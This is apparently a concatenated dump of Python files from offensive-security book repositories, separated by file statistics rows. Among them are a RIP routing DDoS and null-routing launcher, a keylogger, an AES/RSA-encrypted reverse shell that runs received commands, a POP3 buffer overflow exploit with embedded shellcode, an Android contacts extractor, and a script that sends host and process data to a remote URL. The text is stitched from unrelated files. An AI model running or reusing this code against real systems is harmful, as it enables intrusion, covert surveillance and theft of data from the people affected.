},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
| 31.831266 | 204 | 0.528174 |
owtf | """
GREP Plugin for Credentials transport over an encrypted channel (OWASP-AT-001)
https://www.owasp.org/index.php/Testing_for_credentials_transport_%28OWASP-AT-001%29
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
import logging
DESCRIPTION = "Searches transaction DB for credentials protections"
def run(PluginInfo):
# TODO: Needs fixing
# Content = "This plugin looks for password fields and then checks the URL (i.e. http vs. https)<br />"
# Content += "Uniqueness in this case is performed via URL + password field"
# # This retrieves all hidden password fields found in the DB response bodies:
# Command, RegexpName, Matches = ServiceLocator.get_component("transaction").GrepMultiLineResponseRegexp(ServiceLocator.get_component("config").Get('RESPONSE_REGEXP_FOR_PASSWORDS'))
# # Now we need to check if the URL is https or not and count the insecure ones (i.e. not https)
# IDs = []
# InsecureMatches = []
# for ID, FileMatch in Matches:
# if ID not in IDs: # Retrieve Transaction from DB only once
# IDs.append(ID) # Process each transaction only once
# Transaction = ServiceLocator.get_component("transaction").GetByID(ID)
# if 'https' != Transaction.URL.split(":")[0]:
# OWTFLogger.log("Transaction: "+ID+" contains passwords fields with a URL different than https")
# InsecureMatches.append([ID, Transaction.URL+": "+FileMatch]) # Need to make the unique work by URL + password
# Message = "<br /><u>Total insecure matches: "+str(len(InsecureMatches))+'</u>'
# OWTFLogger.log(Message)
# Content += Message+"<br />"
# Content += ServiceLocator.get_component("plugin_helper").DrawResponseMatchesTables([Command, RegexpName, InsecureMatches], PluginInfo)
# return Content
return []
| 54.484848 | 185 | 0.713115 |
Python-Penetration-Testing-Cookbook | from scrapy.item import Item, Field
class BookItem(Item):
title = Field()
price = Field()
| 13.428571 | 35 | 0.66 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Effective-Python-Penetration-Testing | import pyxhook
file_log=/home/rejah/Desktop/file.log'
def OnKeyboardEvent(event):
k = event.Key
if k == "space": k = " "
with open(file_log, 'a+') as keylogging:
keylogging.write('%s\n' % k)
#instantiate HookManager class
hooks_manager = pyxhook.HookManager()
#listen to all keystrokes
hooks_manager.KeyDown=OnKeyPress
#hook the keyboard
hooks_manager.HookKeyboard()
#start the session
hooks_manager.start() | 19.761905 | 43 | 0.708046 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# Hybrid - Client - TCP Reverse Shell
import socket
import subprocess
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
def GET_AES_KEY(KEY):
privatekey = """-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----"""
decryptor = RSA.importKey(privatekey)
AES_Key = decryptor.decrypt(KEY)
return AES_Key
def encrypt(message):
encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return encrypto.encrypt(message)
def decrypt(message):
decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return decrypto.decrypt(message)
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.10.100', 8080))
global key, counter
x = s.recv(1024)
key = GET_AES_KEY( x )
print "Generated AES Key " + str(key)
y = s.recv(1024)
counter = GET_AES_KEY( y )
while True:
command = decrypt(s.recv(1024))
print ' We received: ' + command
if 'terminate' in command:
s.close()
break
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( encrypt (CMD.stdout.read() ) )
s.send( encrypt (CMD.stderr.read()) )
def main ():
connect()
main()
| 36.796992 | 127 | 0.813569 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
LPORT1433 = ""
LPORT1433 += "\x9b\x98\x40\x48\x4b\x98\xd6\x41\x41\x42\xda\xd8"
LPORT1433 += "\xd9\x74\x24\xf4\xbd\x24\x8b\x25\x21\x58\x29\xc9"
LPORT1433 += "\xb1\x52\x83\xe8\xfc\x31\x68\x13\x03\x4c\x98\xc7"
LPORT1433 += "\xd4\x70\x76\x85\x17\x88\x87\xea\x9e\x6d\xb6\x2a"
LPORT1433 += "\xc4\xe6\xe9\x9a\x8e\xaa\x05\x50\xc2\x5e\x9d\x14"
LPORT1433 += "\xcb\x51\x16\x92\x2d\x5c\xa7\x8f\x0e\xff\x2b\xd2"
LPORT1433 += "\x42\xdf\x12\x1d\x97\x1e\x52\x40\x5a\x72\x0b\x0e"
LPORT1433 += "\xc9\x62\x38\x5a\xd2\x09\x72\x4a\x52\xee\xc3\x6d"
LPORT1433 += "\x73\xa1\x58\x34\x53\x40\x8c\x4c\xda\x5a\xd1\x69"
LPORT1433 += "\x94\xd1\x21\x05\x27\x33\x78\xe6\x84\x7a\xb4\x15"
LPORT1433 += "\xd4\xbb\x73\xc6\xa3\xb5\x87\x7b\xb4\x02\xf5\xa7"
LPORT1433 += "\x31\x90\x5d\x23\xe1\x7c\x5f\xe0\x74\xf7\x53\x4d"
LPORT1433 += "\xf2\x5f\x70\x50\xd7\xd4\x8c\xd9\xd6\x3a\x05\x99"
LPORT1433 += "\xfc\x9e\x4d\x79\x9c\x87\x2b\x2c\xa1\xd7\x93\x91"
LPORT1433 += "\x07\x9c\x3e\xc5\x35\xff\x56\x2a\x74\xff\xa6\x24"
LPORT1433 += "\x0f\x8c\x94\xeb\xbb\x1a\x95\x64\x62\xdd\xda\x5e"
LPORT1433 += "\xd2\x71\x25\x61\x23\x58\xe2\x35\x73\xf2\xc3\x35"
LPORT1433 += "\x18\x02\xeb\xe3\x8f\x52\x43\x5c\x70\x02\x23\x0c"
LPORT1433 += "\x18\x48\xac\x73\x38\x73\x66\x1c\xd3\x8e\xe1\xe3"
LPORT1433 += "\x8c\x6a\x63\x8b\xce\x8a\x81\xd5\x46\x6c\xe3\xf5"
LPORT1433 += "\x0e\x27\x9c\x6c\x0b\xb3\x3d\x70\x81\xbe\x7e\xfa"
LPORT1433 += "\x26\x3f\x30\x0b\x42\x53\xa5\xfb\x19\x09\x60\x03"
LPORT1433 += "\xb4\x25\xee\x96\x53\xb5\x79\x8b\xcb\xe2\x2e\x7d"
LPORT1433 += "\x02\x66\xc3\x24\xbc\x94\x1e\xb0\x87\x1c\xc5\x01"
LPORT1433 += "\x09\x9d\x88\x3e\x2d\x8d\x54\xbe\x69\xf9\x08\xe9"
LPORT1433 += "\x27\x57\xef\x43\x86\x01\xb9\x38\x40\xc5\x3c\x73"
LPORT1433 += "\x53\x93\x40\x5e\x25\x7b\xf0\x37\x70\x84\x3d\xd0"
LPORT1433 += "\x74\xfd\x23\x40\x7a\xd4\xe7\x70\x31\x74\x41\x19"
LPORT1433 += "\x9c\xed\xd3\x44\x1f\xd8\x10\x71\x9c\xe8\xe8\x86"
LPORT1433 += "\xbc\x99\xed\xc3\x7a\x72\x9c\x5c\xef\x74\x33\x5c"
LPORT1433 += "\x3a"
#Bingo this works--Had an issue with bad chars.Rev shell also works like charm
buffer = '\x41' * 2606
if 1:
print"Fuzzing PASS with %s bytes" % len(buffer)
#print str(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER username \r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + buffer + '\x8f\x35\x4a\x5f'+ LPORT1433 + '\r\n')
#data=s.recv(1024)
#print str(data)
print "done"
#s.send('QUIT\r\n')
s.close()
| 40.903226 | 78 | 0.680786 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Michael Spreitzenbarth (research@spreitzenbarth.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os, sys, subprocess
import sqlite3 as lite
from prettytable import from_db_cursor
def dump_database(backup_dir):
# dumping the password/pin from the device
print "Dumping contacts database ..."
contactsDB = subprocess.Popen(['adb', 'pull', '/data/data/com.android.providers.contacts/databases/contacts2.db',
backup_dir], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
contactsDB.wait()
def get_content(backup_dir):
# getting the content from the contacts database
con = lite.connect(backup_dir + '/contacts2.db')
cur = con.cursor()
cur.execute("SELECT contacts._id AS _id,contacts.custom_ringtone AS custom_ringtone, name_raw_contact.display_name_source AS display_name_source, name_raw_contact.display_name AS display_name, name_raw_contact.display_name_alt AS display_name_alt, name_raw_contact.phonetic_name AS phonetic_name, name_raw_contact.phonetic_name_style AS phonetic_name_style, name_raw_contact.sort_key AS sort_key, name_raw_contact.phonebook_label AS phonebook_label, name_raw_contact.phonebook_bucket AS phonebook_bucket, name_raw_contact.sort_key_alt AS sort_key_alt, name_raw_contact.phonebook_label_alt AS phonebook_label_alt, name_raw_contact.phonebook_bucket_alt AS phonebook_bucket_alt, has_phone_number, name_raw_contact_id, lookup, photo_id, photo_file_id, CAST(EXISTS (SELECT _id FROM visible_contacts WHERE contacts._id=visible_contacts._id) AS INTEGER) AS in_visible_group, status_update_id, contacts.contact_last_updated_timestamp, contacts.last_time_contacted AS last_time_contacted, contacts.send_to_voicemail AS send_to_voicemail, contacts.starred AS starred, contacts.pinned AS pinned, contacts.times_contacted AS times_contacted, (CASE WHEN photo_file_id IS NULL THEN (CASE WHEN photo_id IS NULL OR photo_id=0 THEN NULL ELSE 'content://com.android.contacts/contacts/'||contacts._id|| '/photo' END) ELSE 'content://com.android.contacts/display_photo/'||photo_file_id END) AS photo_uri, (CASE WHEN photo_id IS NULL OR photo_id=0 THEN NULL ELSE 'content://com.android.contacts/contacts/'||contacts._id|| '/photo' END) AS photo_thumb_uri, 0 AS is_user_profile FROM contacts JOIN raw_contacts AS name_raw_contact ON(name_raw_contact_id=name_raw_contact._id)")
pt = from_db_cursor(cur)
con.close()
print pt
'''
print "\033[0;32mid, custom_ringtone, display_name_source, display_name, display_name_alt, phonetic_name, phonetic_name_style, sort_key, phonebook_label, phonebook_bucket, sort_key_alt, phonebook_label_alt, phonebook_bucket_alt, has_phone_number, name_raw_contact_id, lookup, photo_id, photo_file_id, in_visible_group, status_update_id, contact_last_updated_timestamp, last_time_contacted, send_to_voicemail, starred, pinned, times_contacted, photo_uri, photo_thumb_uri, is_user_profile\033[m"
for entry in data:
print "\033[0;32m" + str(entry) + "\033[m"
'''
if __name__ == '__main__':
# check if device is connected and adb is running as root
if subprocess.Popen(['adb', 'get-state'], stdout=subprocess.PIPE).communicate(0)[0].split("\n")[0] == "unknown":
print "no device connected - exiting..."
sys.exit(2)
# starting to create the output directory
backup_dir = sys.argv[1]
try:
os.stat(backup_dir)
except:
os.mkdir(backup_dir)
dump_database(backup_dir)
get_content(backup_dir)
| 60.073529 | 1,658 | 0.734586 |
cybersecurity-penetration-testing | import requests
import time
def check_httponly(c):
if 'httponly' in c._rest.keys():
return True
else:
return '\x1b[31mFalse\x1b[39;49m'
#req = requests.get('http://www.realvnc.com/support')
values = []
for i in xrange(0,5):
req = requests.get('http://www.google.com')
for cookie in req.cookies:
print 'Name:', cookie.name
print 'Value:', cookie.value
values.append(cookie.value)
if not cookie.secure:
cookie.secure = '\x1b[31mFalse\x1b[39;49m'
print 'HTTPOnly:', check_httponly(cookie), '\n'
time.sleep(2)
print set(values) | 22.869565 | 53 | 0.689781 |
PenTestScripts | #!/usr/bin/env python
# This script enumerates information from the local system
import ctypes
import os
import socket
import string
import subprocess
import urllib2
# URL - You obviously need to edit this, just the IP/domain
url = "https://192.168.1.1/post_enum_data.php"
# Enumerate IP addresses and hostname
host, alias, ip = socket.gethostbyname_ex(socket.gethostname())
# Get full hostname (including domain if applicable)
host = socket.getfqdn()
# Enumerate system drives
drive_space = {}
drives = []
bitmask = ctypes.windll.kernel32.GetLogicalDrives()
for letter in string.uppercase:
if bitmask & 1:
drives.append(letter)
bitmask >>= 1
# get username based off of environmental variable
# might not be true, but probably us
username = os.getenv('USERNAME')
# Get space per drive
for drive_letter in drives:
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(
ctypes.c_wchar_p(drive_letter + ":"), None, None, ctypes.pointer(
free_bytes))
free_megs = free_bytes.value / 1024 / 1024
drive_space[drive_letter] = free_megs
# Get running processes
tasklist_output = subprocess.check_output("tasklist")
data_to_transmit = "hostname - " + str(host) + "\nIP Address(es) - " + str(ip) + "\nSystem Drives and Free Space in Megs - " + str(drive_space) + "\nTasklist Output - " + tasklist_output
# Post the data over https
f = urllib2.urlopen(url, data_to_transmit)
f.close()
| 27.666667 | 186 | 0.712526 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.TextField')(blank=True)),
('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.TextField')(blank=True)),
('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
